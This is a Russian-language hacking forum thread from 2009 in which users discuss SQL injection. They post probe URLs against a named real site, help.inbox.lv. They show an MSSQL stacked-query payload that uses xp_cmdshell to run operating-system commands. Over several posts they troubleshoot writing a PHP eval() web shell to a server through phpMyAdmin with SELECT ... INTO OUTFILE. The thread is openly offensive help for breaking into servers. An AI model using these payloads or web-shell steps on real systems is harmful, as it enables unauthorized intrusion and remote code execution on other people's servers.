Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. -JC-

    -JC- Member

    Joined:
    10 Mar 2009
    Messages:
    54
    Likes Received:
    18
    Reputations:
    11
    Первое, что приходит в голову: можно через reverse ip узнать на сервере другие сайты, а по этим путям попробовать через другой сайт пролезть.
     
    1 person likes this.
  2. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Это не скуля!!! Могу пояснить почему для особо талантливых...
     
  3. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    733
    Likes Received:
    646
    Reputations:
    251
    Наркоман?
    Возьмём ошибку.
    Error pulling cat information from database: (SELECT cat_na as cat, maincat FROM cfaq_cats WHERE catid = 24) Unknown column 'cat_na' in 'field list'

    Я в GET подставил na, получилось cat_na, т.е. такой колонки нету в базе данных.
    А что тогда это?
    XSS? :D
     
  4. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    это скуля ,но там стоит ограничение на длину параметра $_GET['language'] ,и если его значение > 2x ,символов => оно обрезается.
    Примерно таким образом:
    PHP:
    $a=substr($_GET['language'],0,2);
     
  5. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    733
    Likes Received:
    646
    Reputations:
    251
    Я это указал в своём посте.
    Человек спросил про скулю?
    Я ему ответил, что это "как бэ" скуля, но с ограничением в 2 символа.
    А DrAssault говорит что это не скуля.
     
  6. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Что не понятно это НЕ скуля! Что есть скуля?! Это, как минимум возможность повлиять на запрос в своих целях, то есть извлечение данных и т.д. Что мы имеем тут?! Для этого надо разобраться, почему же возникает ошибка... а возникает она именно потому, что значение переданное через гет параметру language не соответствует колоночкам в БД из которых идет выборка, то есть к примеру выборка из колонки cat_ru даёт один резалт (страницу на русском языке), а cat_en другой результат, что логично, так как выборка возможна, такие поля существуют, а ошибка происходит именно потому, что в качестве значения вы подсовываете параметру лажовое значение... А вот теперь вопрос! Внимание... есть ли у нас возможность повлиять на ход запроса?!

    ЗЫ Ctacok, умничать в болталку со своими гениальными шутками!!! Начинаешь действовать на нерву...
     
    1 person likes this.
  7. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    733
    Likes Received:
    646
    Reputations:
    251
    Головой подумай ога, я тебя не оскорблял.

    Во вторых он спросил насчёт скули, я ему ответил, и ты тут валазиешь из тумана.
     
  8. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Сэнкью вэри мач, я так рад, так рад, что ты меня ещё и не оскорбил :mad:

    Ну, во-первых, не из тумана, это форум и тут имеют право отписываться абсолютно все, а во-вторых, я ответил по сабжу, ты с чем то не согласен?
     
  9. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    733
    Likes Received:
    646
    Reputations:
    251
    Так, ты сказал что "скуля" это влияние на SQL запрос?
    Здесь есть влияние на SQL запрос, т.е.
    Данное значение берётся из GET запроса language.
    Я влияю на SQL запрос, просто меня ограничивает скрипт до 2-х знаков.
    Что ещё доказать надо?
    Можно уже и не враждовать, кроме - в репу мы нечего здесь неполучим.
     
  10. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    Да. думаю пора заканчивать.

    Это спор о терминологии. и случай скорее выпадает из классификации, так что истина где-то рядом :

    С одной стороны мы можем внедрить в запрос 2 символа, тоесть инъекция на лицо, а с другой стороны, влиять на запрос мы не можем. Тоесть если мы не можем передать базе верное наше выражение, а можем только вызвать ошибку наверное об иньекции речи быть не может

    Вобщем не сходите с ума, правы оба по своему. А флейм прекращайте.

    =====================

    Там кстати ещё и двойной запрос , но это дела не меняет, хотя если есть такие косяки, может быть и нормальная скуль найдётся, я не особо смотрел

    http://help.inbox.lv/index.php?catid=111111&language=23
    (SELECT cat_23 as cat, maincat FROM cfaq_cats WHERE catid = 111111)

    http://help.inbox.lv/index.php?catid=%00&language=3434
    (SELECT catid, cat_34 as cat, description_34 as description FROM cfaq_cats WHERE maincat = 0 ORDER BY prio ASC)
     
    3 people like this.
  11. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,364
    Likes Received:
    1,150
    Reputations:
    430
    www.site.ru/index.asp?user=1'; exec master..xp_cmdshell 'CMD COMMAD HERE' --
     
  12. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    Преимуществом этой СУБД есть то, что в скулях можно закрывать один запрос (;) и выполненять другой... Поясню: Если есть уязвимый код, н.п.:
    PHP:
    mssql_query('SELECT * FROM news WHERE id='.$_GET['id'].);
    При подставке в id, н.п. 1, запрос в БД будет выглядеть так:
    Code:
    SELECT * FROM news WHERE id=1
    Это понятно :) Но можно сделать так:
    Code:
    ?id=1; exec master..xp_cmdshell 'здесь комманда консоли винды'
    тогда первый запрос будет
    Code:
    SELECT * FROM news WHERE id=1
    второй:
    Code:
    exec master..xp_cmdshell 'здесь комманда консоли винды'
    Про "exec", "master..xp_cmdshell" почитай в гугле :)

    PS: Но exec не всегда разрешен. В большинстве случаев - только при пользователе "su" (это как root в MySQL)
     
    #9152 mailbrush, 7 Oct 2009
    Last edited: 7 Oct 2009
    2 people like this.
  13. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,508
    Likes Received:
    389
    Reputations:
    101
    Пользователь sa =)
    Nightmare - https://forum.antichat.ru/thread30501-mssql.html
     
    #9153 krypt3r, 8 Oct 2009
    Last edited: 8 Oct 2009
  14. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    319
    Likes Received:
    110
    Reputations:
    18
    Всем привет,такая проблема:
    Есть рут от пхпадмина phpMyAdmin 2.6.2-Debian,
    Выполняю запрос:
    Code:
    select '<?php eval($_GET[e]); ?>' into outfile '/var/www/new/pma/1.php'
    получаю

    Code:
    SQL-запрос: Документация
    
    SELECT '&lt;?php eval($_GET[e]); ?&gt;'
    INTO OUTFILE '/var/www/new/pma/1.php'
    
    Ответ MySQL: Документация
    #1064 - You have an error in your SQL syntax.  Check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 
    пути правельные из пхпинфо взял.
    Зарание спасибо
     
    #9154 Shadrin, 8 Oct 2009
    Last edited: 8 Oct 2009
  15. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,508
    Likes Received:
    389
    Reputations:
    101
    Попробуйте
    Code:
    SELECT ... FROM sometable INTO OUTFILE ...
    
    где sometable - имя существующей таблицы
     
    1 person likes this.
  16. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    319
    Likes Received:
    110
    Reputations:
    18
    krypt3r спасибо уже что то ,
    Code:
     SQL-запрос: Документация
    
    SELECT '&lt;?php eval($_GET[e]); ?&gt;'
    FROM db
    INTO OUTFILE '/var/www/osiatis_new/landesk/ll.php'
    
    Ответ MySQL: Документация
    #1 - Can't create/write to file '/var/www/new/11/ll.php' (Errcode: 13) 
    все равно каким то боком кавычки мешают(

    jokester
    выполняю запросы в поле
    Выполнить SQL запрос(ы) на БД
    UPD можешь ради интереса попробовать вот так:
    вылетает
    Code:
    #1064 - You have an error in your SQL syntax.  Check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 
    И проверил пользователя
    root ALL PRIVILEGES
    :confused:
    К примеру отбросим фильтр кавычек ,и смтря на первую ошибку получается что запись невозможна?
     
    #9156 Shadrin, 8 Oct 2009
    Last edited: 8 Oct 2009
  17. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    Shadrin
    Хех, это я протупил, krypt3r прав, у тебя база просто 4, я неподумал. Теперь просто ошибка записи в папку. тоесть прав нет попросту Ищи папку на запись.
     
    #9157 Kakoytoxaker, 8 Oct 2009
    Last edited: 8 Oct 2009
  18. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    319
    Likes Received:
    110
    Reputations:
    18
    Code:
    Ваш SQL-запрос был успешно выполнен (Запрос занял 0.0661 сек)
    SQL-запрос: 
    SELECT '<?php eval($_GET[e]); ?>'
    FROM db
    INTO OUTFILE '/tmp/1'
    а тут норм все :confused: ..
    А как быстро найти папку с правами на запись?
    кроме гугла и сканеров котрые по линкам ходят
     
    #9158 Shadrin, 8 Oct 2009
    Last edited: 8 Oct 2009
  19. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,508
    Likes Received:
    389
    Reputations:
    101
    Ключевая фраза
    =)
    На запись в /tmp права всегда есть.
     
  20. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    319
    Likes Received:
    110
    Reputations:
    18
    нет, это ясно,вопрос был в том что кавычки не ружутся при запись в tmp..вообщем папку надыбыл щас писать будемс
    всем большое спасибо!
     
Loading...
Thread Status:
Not open for further replies.